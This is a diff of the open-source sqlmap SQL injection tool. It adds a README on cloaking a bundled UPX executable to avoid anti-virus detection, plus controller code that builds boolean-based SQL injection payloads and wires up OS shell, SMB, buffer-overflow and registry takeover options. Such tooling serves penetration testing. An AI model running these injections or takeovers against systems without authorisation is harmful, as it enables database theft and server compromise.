+bootable Linux kernel image (``vmlinuz'', ``zImage'', ``bzImage''),
+gzip-decompress it and re-compress it with the <strong>UPX</strong> compression method.</p>
+<p>vmlinuz/386 is completely unrelated to the other Linux executable
+formats, and it does not share any of their drawbacks.</p>
+<p>Notes:</p>
+<pre>
+  - Be sure that &quot;vmlinuz/386&quot; or &quot;bvmlinuz/386&quot; is displayed
+  during compression - otherwise a wrong executable format
+  may have been used, and the kernel won't boot.</pre>
+<p>Benefits:</p>
+<pre>
+  - Better compression (but note that the kernel was already compressed,
+  so the improvement is not as large as with other formats).
+  Still, the bytes saved may be essential for special needs like
+  boot disks.</pre>
+<pre>
+     For example, this is what I get for my 2.2.16 kernel:
+        1589708  vmlinux
+         641073  bzImage        [original]
+         560755  bzImage.upx    [compressed by &quot;upx -9&quot;]</pre>
+<pre>
+  - Much faster decompression at kernel boot time (but kernel
+    decompression speed is not really an issue these days).</pre>
+<p>Drawbacks:</p>
+<pre>
+  (none)</pre>
+<p>Extra options available for this executable format:</p>
+<pre>
+  --all-methods       Compress the program several times, using all
+                      available compression methods. This may improve
+                      the compression ratio in some cases, but usually
+                      the default method gives the best results anyway.</pre>
+<pre>
+  --all-filters       Compress the program several times, using all
+                      available preprocessing filters. This may improve
+                      the compression ratio in some cases, but usually
+                      the default filter gives the best results anyway.</pre>
+<p>
+</p>
+<h2><a name="notes_for_watcom_le">NOTES FOR WATCOM/LE</a></h2>
+<p><strong>UPX</strong> has been successfully tested with the following extenders:
+  DOS4G, DOS4GW, PMODE/W, DOS32a, CauseWay.
+  The WDOS/X extender is partly supported (for details
+  see the file bugs BUGS).</p>
+<p>DLLs and the LX format are not supported.</p>
+<p>Extra options available for this executable format:</p>
+<pre>
+  --le                Produce an unbound LE output instead of
+                      keeping the current stub.</pre>
+<p>
+</p>
+<h2><a name="notes_for_win32_pe">NOTES FOR WIN32/PE</a></h2>
+<p>The PE support in <strong>UPX</strong> is quite stable now, but probably there are
+still some incompatibilities with some files.</p>
+<p>Because of the way <strong>UPX</strong> (and other packers for this format) works, you
+can see increased memory usage of your compressed files because the whole
+program is loaded into memory at startup.
+If you start several instances of huge compressed programs you're
+wasting memory because the common segments of the program won't
+get shared across the instances.
+On the other hand if you're compressing only smaller programs, or
+running only one instance of larger programs, then this penalty is
+smaller, but it's still there.</p>
+<p>If you're running executables from network, then compressed programs
+will load faster, and require less bandwidth during execution.</p>
+<p>DLLs are supported. But UPX compressed DLLs can not share common data and
+code when they got used by multiple applications. So compressing msvcrt.dll
+is a waste of memory, but compressing the dll plugins of a particular
+application may be a better idea.</p>
+<p>Screensavers are supported, with the restriction that the filename
+must end with ``.scr'' (as screensavers are handled slightly different
+than normal exe files).</p>
+<p>UPX compressed PE files have some minor memory overhead (usually in the
+10 - 30 KiB range) which can be seen by specifying the ``-i'' command
+line switch during compression.</p>
+<p>Extra options available for this executable format:</p>
+<pre>
+ --compress-exports=0 Don't compress the export section.
+                      Use this if you plan to run the compressed
+                      program under Wine.
+ --compress-exports=1 Compress the export section. [DEFAULT]
+                      Compression of the export section can improve the
+                      compression ratio quite a bit but may not work
+                      with all programs (like winword.exe).
+                      UPX never compresses the export section of a DLL
+                      regardless of this option.</pre>
+<pre>
+  --compress-icons=0  Don't compress any icons.
+  --compress-icons=1  Compress all but the first icon.
+  --compress-icons=2  Compress all icons which are not in the
+                      first icon directory. [DEFAULT]
+  --compress-icons=3  Compress all icons.</pre>
+<pre>
+  --compress-resources=0  Don't compress any resources at all.</pre>
+<pre>
+  --keep-resource=list Don't compress resources specified by the list.
+                      The members of the list are separated by commas.
+                      A list member has the following format: I&lt;type[/name]&gt;.
+                      I&lt;Type&gt; is the type of the resource. Standard types
+                      must be specified as decimal numbers, user types can be
+                      specified by decimal IDs or strings. I&lt;Name&gt; is the
+                      identifier of the resource. It can be a decimal number
+                      or a string. For example:</pre>
+<pre>
+                      --keep-resource=2/MYBITMAP,5,6/12345</pre>
+<pre>
+                      UPX won't compress the named bitmap resource &quot;MYBITMAP&quot;,
+                      it leaves every dialog (5) resource uncompressed, and
+                      it won't touch the string table resource with identifier
+                      12345.</pre>
+<pre>
+  --force             Force compression even when there is an
+                      unexpected value in a header field.
+                      Use with care.</pre>
+<pre>
+  --strip-relocs=0    Don't strip relocation records.
+  --strip-relocs=1    Strip relocation records. [DEFAULT]
+                      This option only works on executables with base
+                      address greater or equal to 0x400000. Usually the
+                      compressed files becomes smaller, but some files
+                      may become larger. Note that the resulting file will
+                      not work under Windows 3.x (Win32s).
+                      UPX never strips relocations from a DLL
+                      regardless of this option.</pre>
+<pre>
+  --all-methods       Compress the program several times, using all
+                      available compression methods. This may improve
+                      the compression ratio in some cases, but usually
+                      the default method gives the best results anyway.</pre>
+<pre>
+  --all-filters       Compress the program several times, using all
+                      available preprocessing filters. This may improve
+                      the compression ratio in some cases, but usually
+                      the default filter gives the best results anyway.</pre>
+<p>
+</p>
+<hr />
+<h1><a name="diagnostics">DIAGNOSTICS</a></h1>
+<p>Exit status is normally 0; if an error occurs, exit status
+is 1. If a warning occurs, exit status is 2.</p>
+<p><strong>UPX</strong>'s diagnostics are intended to be self-explanatory.</p>
+<p>
+</p>
+<hr />
+<h1><a name="bugs">BUGS</a></h1>
+<p>Please report all bugs immediately to the authors.</p>
+<p>
+</p>
+<hr />
+<h1><a name="authors">AUTHORS</a></h1>
+<pre>
+ Markus F.X.J. Oberhumer &lt;markus@oberhumer.com&gt;
+ <a href="http://www.oberhumer.com">http://www.oberhumer.com</a></pre>
+<pre>
+ Laszlo Molnar &lt;ml1050@users.sourceforge.net&gt;</pre>
+<pre>
+ John F. Reiser &lt;jreiser@BitWagon.com&gt;</pre>
+<pre>
+ Jens Medoch &lt;jssg@users.sourceforge.net&gt;</pre>
+<p>
+</p>
+<hr />
+<h1><a name="copyright">COPYRIGHT</a></h1>
+<p>Copyright (C) 1996-2008 Markus Franz Xaver Johannes Oberhumer</p>
+<p>Copyright (C) 1996-2008 Laszlo Molnar</p>
+<p>Copyright (C) 2000-2008 John F. Reiser</p>
+<p>Copyright (C) 2002-2008 Jens Medoch</p>
+<p>This program may be used freely, and you are welcome to
+redistribute it under certain conditions.</p>
+<p>This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+<strong>UPX License Agreement</strong> for more details.</p>
+<p>You should have received a copy of the UPX License Agreement along
+with this program; see the file LICENSE. If not, visit the UPX home page.</p>
+
+</body>
+
+</html>
--- a/lib/contrib/upx/linux/upx
+++ b/lib/contrib/upx/linux/upx
--- a/lib/contrib/upx/macosx/upx
+++ b/lib/contrib/upx/macosx/upx
--- a/lib/contrib/upx/windows/README.txt
+++ b/lib/contrib/upx/windows/README.txt
@@ -0,0 +1,11 @@
+Due to the anti-virus positive detection of executable stored inside this
+folder,  we needed to somehow circumvent this. As from the plain sqlmap
+users perspective nothing has to be done prior to its usage by sqlmap, but
+if you want to have access to the original executable use the decrypt
+functionality of the ../../../../extra/cloak/cloak.py utility.
+
+To prepare the executable to the cloaked form use this command:
+python ../../../../extra/cloak/cloak.py -i upx.exe
+
+To get back the original executable use this:
+python ../../../../extra/cloak/cloak.py -d -i upx.exe_
--- a/lib/contrib/upx/windows/upx.exe_
+++ b/lib/contrib/upx/windows/upx.exe_
--- a/lib/controller/init.py
+++ b/lib/controller/init.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 from lib.controller.handler import setHandler
 from lib.core.common import getHtmlErrorFp
 from lib.core.data import conf
@@ -31,8 +29,9 @@ from lib.core.data import kb
 from lib.core.dump import dumper
 from lib.core.exception import sqlmapUnsupportedDBMSException
 from lib.core.settings import SUPPORTED_DBMS
+from lib.techniques.blind.timebased import timeTest
 from lib.techniques.inband.union.test import unionTest
-
+from lib.techniques.outband.stacked import stackedTest

 def action():
    """
@@ -66,10 +65,16 @@ def action():

        raise sqlmapUnsupportedDBMSException, errMsg

-    print "back-end DBMS:\t%s\n" % conf.dbmsHandler.getFingerprint()
+    print "%s\n" % conf.dbmsHandler.getFingerprint()

-    # Miscellaneous options
-    if conf.unionTest:
+    # Techniques options
+    if conf.stackedTest:
+        dumper.string("stacked queries support", stackedTest())
+
+    if conf.timeTest:
+        dumper.string("time based blind sql injection payload", timeTest())
+
+    if ( conf.unionUse or conf.unionTest ) and not kb.unionPosition:
        dumper.string("valid union", unionTest())

    # Enumeration options
@@ -82,6 +87,9 @@ def action():
    if conf.getCurrentDb:
        dumper.string("current database", conf.dbmsHandler.getCurrentDb())

+    if conf.isDba:
+        dumper.string("current user is DBA", conf.dbmsHandler.isDba())
+
    if conf.getUsers:
        dumper.lister("database management system users", conf.dbmsHandler.getUsers())

@@ -114,13 +122,43 @@ def action():
    if conf.sqlShell:
        conf.dbmsHandler.sqlShell()

+    # User-defined function options
+    if conf.udfInject:
+        conf.dbmsHandler.udfInjectCustom()
+
    # File system options
    if conf.rFile:
-        dumper.string(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
+        dumper.string("%s file saved to" % conf.rFile, conf.dbmsHandler.readFile(conf.rFile), sort=False)

    if conf.wFile:
-        dumper.string(conf.wFile, conf.dbmsHandler.writeFile(conf.wFile))
+        conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType)
+
+    # Operating system options
+    if conf.osCmd:
+        conf.dbmsHandler.osCmd()

-    # Takeover options
    if conf.osShell:
        conf.dbmsHandler.osShell()
+
+    if conf.osPwn:
+        conf.dbmsHandler.osPwn()
+
+    if conf.osSmb:
+        conf.dbmsHandler.osSmb()
+
+    if conf.osBof:
+        conf.dbmsHandler.osBof()
+
+    # Windows registry options
+    if conf.regRead:
+        dumper.string("Registry key value data", conf.dbmsHandler.regRead())
+
+    if conf.regAdd:
+        conf.dbmsHandler.regAdd()
+
+    if conf.regDel:
+        conf.dbmsHandler.regDel()
+
+    # Miscellaneous options
+    if conf.cleanup:
+        conf.dbmsHandler.cleanup()
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,22 +22,22 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
+import re
 import time

-from lib.controller.action import action
 from lib.core.agent import agent
 from lib.core.common import randomInt
 from lib.core.common import randomStr
+from lib.core.convert import md5hash
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import sqlmapConnectionException
+from lib.core.exception import sqlmapNoneDataException
 from lib.core.session import setString
+from lib.core.session import setRegexp
 from lib.request.connect import Connect as Request

-
 def checkSqlInjection(place, parameter, value, parenthesis):
    """
    This function checks if the GET, POST, Cookie, User-Agent
@@ -49,167 +49,202 @@ def checkSqlInjection(place, parameter, value, parenthesis):
      * Double quoted string injection
    """

-    logMsg  = "testing unescaped numeric injection "
-    logMsg += "on %s parameter '%s'" % (place, parameter)
-    logger.info(logMsg)
-
    randInt = randomInt()
    randStr = randomStr()

+    if conf.prefix or conf.postfix:
+        prefix  = ""
+        postfix = ""
+
+        if conf.prefix:
+            prefix = conf.prefix
+
+        if conf.postfix:
+            postfix = conf.postfix
+
+        infoMsg  = "testing custom injection "
+        infoMsg += "on %s parameter '%s'" % (place, parameter)
+        logger.info(infoMsg)
+
+        payload = agent.payload(place, parameter, value, "%s%s%s AND %s%d=%d %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt, postfix))
+        trueResult = Request.queryPage(payload, place)
+
+        if trueResult:
+            payload = agent.payload(place, parameter, value, "%s%s%s AND %s%d=%d %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1, postfix))
+            falseResult = Request.queryPage(payload, place)
+
+            if not falseResult:
+                infoMsg  = "confirming custom injection "
+                infoMsg += "on %s parameter '%s'" % (place, parameter)
+                logger.info(infoMsg)
+
+                payload = agent.payload(place, parameter, value, "%s%s%s AND %s%s %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randStr, postfix))
+                falseResult = Request.queryPage(payload, place)
+
+                if not falseResult:
+                    infoMsg  = "%s parameter '%s' is " % (place, parameter)
+                    infoMsg += "custom injectable "
+                    logger.info(infoMsg)
+
+                    return "custom"
+
+    infoMsg  = "testing unescaped numeric injection "
+    infoMsg += "on %s parameter '%s'" % (place, parameter)
+    logger.info(infoMsg)
+
    payload = agent.payload(place, parameter, value, "%s%s AND %s%d=%d" % (value, ")" * parenthesis, "(" * parenthesis, randInt, randInt))
    trueResult = Request.queryPage(payload, place)

-    if trueResult == kb.defaultResult:
+    if trueResult:
        payload = agent.payload(place, parameter, value, "%s%s AND %s%d=%d" % (value, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1))
        falseResult = Request.queryPage(payload, place)

-        if falseResult != kb.defaultResult:
-            logMsg  = "confirming unescaped numeric injection "
-            logMsg += "on %s parameter '%s'" % (place, parameter)
-            logger.info(logMsg)
+        if not falseResult:
+            infoMsg  = "confirming unescaped numeric injection "
+            infoMsg += "on %s parameter '%s'" % (place, parameter)
+            logger.info(infoMsg)

            payload = agent.payload(place, parameter, value, "%s%s AND %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
            falseResult = Request.queryPage(payload, place)

-            if falseResult != kb.defaultResult:
-                logMsg  = "%s parameter '%s' is " % (place, parameter)
-                logMsg += "unescaped numeric injectable "
-                logMsg += "with %d parenthesis" % parenthesis
-                logger.info(logMsg)
+            if not falseResult:
+                infoMsg  = "%s parameter '%s' is " % (place, parameter)
+                infoMsg += "unescaped numeric injectable "
+                infoMsg += "with %d parenthesis" % parenthesis
+                logger.info(infoMsg)

                return "numeric"

-    logMsg  = "%s parameter '%s' is not " % (place, parameter)
-    logMsg += "unescaped numeric injectable"
-    logger.info(logMsg)
+    infoMsg  = "%s parameter '%s' is not " % (place, parameter)
+    infoMsg += "unescaped numeric injectable"
+    logger.info(infoMsg)

-    logMsg  = "testing single quoted string injection "
-    logMsg += "on %s parameter '%s'" % (place, parameter)
-    logger.info(logMsg)
+    infoMsg  = "testing single quoted string injection "
+    infoMsg += "on %s parameter '%s'" % (place, parameter)
+    logger.info(infoMsg)

    payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s'='%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
    trueResult = Request.queryPage(payload, place)

-    if trueResult == kb.defaultResult:
-        payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s'='%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + 'A'))
+    if trueResult:
+        payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s'='%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
        falseResult = Request.queryPage(payload, place)

-        if falseResult != kb.defaultResult:
-            logMsg  = "confirming single quoted string injection "
-            logMsg += "on %s parameter '%s'" % (place, parameter)
-            logger.info(logMsg)
+        if not falseResult:
+            infoMsg  = "confirming single quoted string injection "
+            infoMsg += "on %s parameter '%s'" % (place, parameter)
+            logger.info(infoMsg)

            payload = agent.payload(place, parameter, value, "%s'%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
            falseResult = Request.queryPage(payload, place)

-            if falseResult != kb.defaultResult:
-                logMsg  = "%s parameter '%s' is " % (place, parameter)
-                logMsg += "single quoted string injectable "
-                logMsg += "with %d parenthesis" % parenthesis
-                logger.info(logMsg)
+            if not falseResult:
+                infoMsg  = "%s parameter '%s' is " % (place, parameter)
+                infoMsg += "single quoted string injectable "
+                infoMsg += "with %d parenthesis" % parenthesis
+                logger.info(infoMsg)

                return "stringsingle"

-    logMsg  = "%s parameter '%s' is not " % (place, parameter)
-    logMsg += "single quoted string injectable"
-    logger.info(logMsg)
+    infoMsg  = "%s parameter '%s' is not " % (place, parameter)
+    infoMsg += "single quoted string injectable"
+    logger.info(infoMsg)

-    logMsg  = "testing LIKE single quoted string injection "
-    logMsg += "on %s parameter '%s'" % (place, parameter)
-    logger.info(logMsg)
+    infoMsg  = "testing LIKE single quoted string injection "
+    infoMsg += "on %s parameter '%s'" % (place, parameter)
+    logger.info(infoMsg)

    payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s' LIKE '%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
    trueResult = Request.queryPage(payload, place)

-    if trueResult == kb.defaultResult:
-        payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s' LIKE '%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + 'A'))
+    if trueResult:
+        payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s' LIKE '%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
        falseResult = Request.queryPage(payload, place)

-        if falseResult != kb.defaultResult:
-            logMsg  = "confirming LIKE single quoted string injection "
-            logMsg += "on %s parameter '%s'" % (place, parameter)
-            logger.info(logMsg)
+        if not falseResult:
+            infoMsg  = "confirming LIKE single quoted string injection "
+            infoMsg += "on %s parameter '%s'" % (place, parameter)
+            logger.info(infoMsg)

            payload = agent.payload(place, parameter, value, "%s'%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
            falseResult = Request.queryPage(payload, place)

-            if falseResult != kb.defaultResult:
-                logMsg  = "%s parameter '%s' is " % (place, parameter)
-                logMsg += "LIKE single quoted string injectable "
-                logMsg += "with %d parenthesis" % parenthesis
-                logger.info(logMsg)
+            if not falseResult:
+                infoMsg  = "%s parameter '%s' is " % (place, parameter)
+                infoMsg += "LIKE single quoted string injectable "
+                infoMsg += "with %d parenthesis" % parenthesis
+                logger.info(infoMsg)

                return "likesingle"

-    logMsg  = "%s parameter '%s' is not " % (place, parameter)
-    logMsg += "LIKE single quoted string injectable"
-    logger.info(logMsg)
+    infoMsg  = "%s parameter '%s' is not " % (place, parameter)
+    infoMsg += "LIKE single quoted string injectable"
+    logger.info(infoMsg)

-    logMsg  = "testing double quoted string injection "
-    logMsg += "on %s parameter '%s'" % (place, parameter)
-    logger.info(logMsg)
+    infoMsg  = "testing double quoted string injection "
+    infoMsg += "on %s parameter '%s'" % (place, parameter)
+    logger.info(infoMsg)

    payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\"=\"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
    trueResult = Request.queryPage(payload, place)

-    if trueResult == kb.defaultResult:
-        payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\"=\"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + 'A'))
+    if trueResult:
+        payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\"=\"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
        falseResult = Request.queryPage(payload, place)

-        if falseResult != kb.defaultResult:
-            logMsg  = "confirming double quoted string injection "
-            logMsg += "on %s parameter '%s'" % (place, parameter)
-            logger.info(logMsg)
+        if not falseResult:
+            infoMsg  = "confirming double quoted string injection "
+            infoMsg += "on %s parameter '%s'" % (place, parameter)
+            logger.info(infoMsg)

            payload = agent.payload(place, parameter, value, "%s\"%s AND %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
            falseResult = Request.queryPage(payload, place)

-            if falseResult != kb.defaultResult:
-                logMsg  = "%s parameter '%s' is " % (place, parameter)
-                logMsg += "double quoted string injectable "
-                logMsg += "with %d parenthesis" % parenthesis
-                logger.info(logMsg)
+            if not falseResult:
+                infoMsg  = "%s parameter '%s' is " % (place, parameter)
+                infoMsg += "double quoted string injectable "
+                infoMsg += "with %d parenthesis" % parenthesis
+                logger.info(infoMsg)

                return "stringdouble"

-    logMsg  = "%s parameter '%s' is not " % (place, parameter)
-    logMsg += "double quoted string injectable"
-    logger.info(logMsg)
+    infoMsg  = "%s parameter '%s' is not " % (place, parameter)
+    infoMsg += "double quoted string injectable"
+    logger.info(infoMsg)

-    logMsg  = "testing LIKE double quoted string injection "
-    logMsg += "on %s parameter '%s'" % (place, parameter)
-    logger.info(logMsg)
+    infoMsg  = "testing LIKE double quoted string injection "
+    infoMsg += "on %s parameter '%s'" % (place, parameter)
+    logger.info(infoMsg)

    payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\" LIKE \"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
    trueResult = Request.queryPage(payload, place)

-    if trueResult == kb.defaultResult:
-        payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\" LIKE \"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + 'A'))
+    if trueResult:
+        payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\" LIKE \"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
        falseResult = Request.queryPage(payload, place)

-        if falseResult != kb.defaultResult:
-            logMsg  = "confirming LIKE double quoted string injection "
-            logMsg += "on %s parameter '%s'" % (place, parameter)
-            logger.info(logMsg)
+        if not falseResult:
+            infoMsg  = "confirming LIKE double quoted string injection "
+            infoMsg += "on %s parameter '%s'" % (place, parameter)
+            logger.info(infoMsg)

            payload = agent.payload(place, parameter, value, "%s\"%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
            falseResult = Request.queryPage(payload, place)

-            if falseResult != kb.defaultResult:
-                logMsg  = "%s parameter '%s' is " % (place, parameter)
-                logMsg += "LIKE double quoted string injectable "
-                logMsg += "with %d parenthesis" % parenthesis
-                logger.info(logMsg)
+            if not falseResult:
+                infoMsg  = "%s parameter '%s' is " % (place, parameter)
+                infoMsg += "LIKE double quoted string injectable "
+                infoMsg += "with %d parenthesis" % parenthesis
+                logger.info(infoMsg)

                return "likedouble"

-    logMsg  = "%s parameter '%s' is not " % (place, parameter)
-    logMsg += "LIKE double quoted string injectable"
-    logger.info(logMsg)
+    infoMsg  = "%s parameter '%s' is not " % (place, parameter)
+    infoMsg += "LIKE double quoted string injectable"
+    logger.info(infoMsg)

    return None

-
 def checkDynParam(place, parameter, value):
    """
    This function checks if the url parameter is dynamic. If it is
@@ -217,18 +252,18 @@ def checkDynParam(place, parameter, value):
    dynamicity might depend on another parameter.
    """

-    logMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
-    logger.info(logMsg)
+    infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
+    logger.info(infoMsg)

    randInt = randomInt()
    payload = agent.payload(place, parameter, value, str(randInt))
    dynResult1 = Request.queryPage(payload, place)

-    if kb.defaultResult == dynResult1:
+    if True == dynResult1:
        return False

-    logMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
-    logger.info(logMsg)
+    infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
+    logger.info(infoMsg)

    payload = agent.payload(place, parameter, value, "'%s" % randomStr())
    dynResult2 = Request.queryPage(payload, place)
@@ -236,12 +271,11 @@ def checkDynParam(place, parameter, value):
    payload = agent.payload(place, parameter, value, "\"%s" % randomStr())
    dynResult3 = Request.queryPage(payload, place)

-    condition  = kb.defaultResult != dynResult2
-    condition |= kb.defaultResult != dynResult3
+    condition  = True != dynResult2
+    condition |= True != dynResult3

    return condition

-
 def checkStability():
    """
    This function checks if the URL content is stable requesting the
@@ -253,23 +287,37 @@ def checkStability():
    like for instance string matching (--string).
    """

-    logMsg = "testing if the url is stable, wait a few seconds"
+    infoMsg = "testing if the url is stable, wait a few seconds"
+    logger.info(infoMsg)
+
+    firstPage, _ = Request.queryPage(content=True)
+    time.sleep(1)
+    secondPage, _ = Request.queryPage(content=True)
+
+    condition = (firstPage == secondPage)
+
+    if condition:
+        if firstPage:
+            conf.md5hash = md5hash(firstPage)
+            logMsg  = "url is stable"
            logger.info(logMsg)
+        else:
+            exceptionMsg   = "there was an error checking the stability of page "
+            exceptionMsg  += "because of lack of content. please check the "
+            exceptionMsg  += "page request results (and probable errors) by "
+            exceptionMsg  += "using higher verbosity levels"
+            raise sqlmapNoneDataException, exceptionMsg

-    firstResult = Request.queryPage()
-    time.sleep(0.5)
-
-    secondResult = Request.queryPage()
-    time.sleep(0.5)
-
-    thirdResult = Request.queryPage()
-
-    condition  = firstResult == secondResult
-    condition &= secondResult == thirdResult
+    elif not condition:
+        warnMsg  = "url is not stable, sqlmap will base the page "
+        warnMsg += "comparison on a sequence matcher, if no dynamic nor "
+        warnMsg += "injectable parameters are detected, refer to user's "
+        warnMsg += "manual paragraph 'Page comparison' and provide a "
+        warnMsg += "string or regular expression to match on"
+        logger.warn(warnMsg)

    return condition

-
 def checkString():
    if not conf.string:
        return True
@@ -283,11 +331,11 @@ def checkString():
    if condition:
        return True

-    logMsg  = "testing if the provided string is within the "
-    logMsg += "target URL page content"
-    logger.info(logMsg)
+    infoMsg  = "testing if the provided string is within the "
+    infoMsg += "target URL page content"
+    logger.info(infoMsg)

-    page = Request.queryPage(content=True)
+    page, _ = Request.queryPage(content=True)

    if conf.string in page:
        setString()
@@ -300,17 +348,52 @@ def checkString():

        return False

+def checkRegexp():
+    if not conf.regexp:
+        return True
+
+    condition = (
+                  kb.resumedQueries.has_key(conf.url) and
+                  kb.resumedQueries[conf.url].has_key("Regular expression") and
+                  kb.resumedQueries[conf.url]["Regular expression"][:-1] == conf.regexp
+                )
+
+    if condition:
+        return True
+
+    infoMsg  = "testing if the provided regular expression matches within "
+    infoMsg += "the target URL page content"
+    logger.info(infoMsg)
+
+    page, _ = Request.queryPage(content=True)
+
+    if re.search(conf.regexp, page, re.I | re.M):
+        setRegexp()
+        return True
+    else:
+        errMsg  = "you provided '%s' as the regular expression to " % conf.regexp
+        errMsg += "match, but such a regular expression does not have any "
+        errMsg += "match within the target URL page content, please provide "
+        errMsg += "another regular expression."
+        logger.error(errMsg)
+
+        return False

 def checkConnection():
-    logMsg = "testing connection to the target url"
-    logger.info(logMsg)
+    infoMsg = "testing connection to the target url"
+    logger.info(infoMsg)

    try:
-        kb.defaultResult = Request.queryPage()
+        page, _ = Request.getPage()
+        conf.seqMatcher.set_seq1(page)
+
    except sqlmapConnectionException, exceptionMsg:
-        if conf.googleDork:
+        exceptionMsg = str(exceptionMsg)
+
+        if conf.multipleTargets:
            exceptionMsg += ", skipping to next url"
            logger.warn(exceptionMsg)
+
            return False
        else:
            raise sqlmapConnectionException, exceptionMsg
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,27 +22,25 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 from lib.controller.action import action
 from lib.controller.checks import checkSqlInjection
 from lib.controller.checks import checkDynParam
 from lib.controller.checks import checkStability
 from lib.controller.checks import checkString
+from lib.controller.checks import checkRegexp
 from lib.controller.checks import checkConnection
 from lib.core.common import paramToDict
+from lib.core.common import parseTargetUrl
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
-from lib.core.exception import sqlmapConnectionException
 from lib.core.exception import sqlmapNotVulnerableException
 from lib.core.session import setInjection
 from lib.core.target import createTargetDirs
 from lib.core.target import initTargetEnv
 from lib.utils.parenthesis import checkForParenthesis

-
 def __selectInjection(injData):
    """
    Selection function for injection place, parameters and type.
@@ -64,7 +62,7 @@ def __selectInjection(injData):

        message += "\n"

-    message += "[q] Quit\nChoice: "
+    message += "[q] Quit"
    select   = readInput(message, default="0")

    if not select:
@@ -83,7 +81,6 @@ def __selectInjection(injData):

    return injData[index]

-
 def start():
    """
    This function calls a function that performs checks on both URL
@@ -92,28 +89,44 @@ def start():
    """

    if conf.url:
